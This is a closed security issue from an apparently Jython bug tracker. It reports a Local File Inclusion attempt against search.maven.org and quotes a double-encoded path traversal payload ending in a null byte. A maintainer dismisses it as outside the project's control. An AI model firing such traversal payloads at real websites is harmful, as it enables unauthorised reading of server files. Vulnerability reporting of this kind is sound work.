Issue2782

classification
Title: with Local File Inclusion getting directories and files
Type: security
Severity: critical
Components: website
Versions:
Milestone:
process
Status: closed
Resolution: invalid
Dependencies:
Superseder:
Assigned To:
Nosy List: forsa41, jeff.allen
Priority:
Keywords:

Created on 2019-07-01.08:24:13 by forsa41, last changed 2019-07-06.16:24:32 by jeff.allen.

Files
File name Uploaded Description Edit Remove
Screenshot from 2019-07-01 11-08-30.jpg forsa41, 2019-07-01.08:24:13
Messages
msg12570 (view) Author: Tugcan Ozel (forsa41) Date: 2019-07-01.08:24:13
While I was downloading Jython 2.7 for my Burp plugin, I saw a filepath parameter in GET requests. I tried an LFI payload and got the picture that is in the attachments.
Payload description: double encoding and null parameter
payload:https://search.maven.org/remotecontent?filepath=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
msg12572 (view) Author: Jeff Allen (jeff.allen) Date: 2019-07-06.16:24:31
Thanks, but these are directories on maven.org, which we don't control. FWIW I think it is intentional. See also #2681.
History
Date User Action Args
2019-07-06 16:24:32 jeff.allen set status: open -> closed
resolution: invalid
messages: + msg12572
nosy: + jeff.allen
2019-07-03 10:20:06 forsa41 set title: LFI -> with Local File Inclusion getting directories and files
2019-07-01 08:24:13 forsa41 create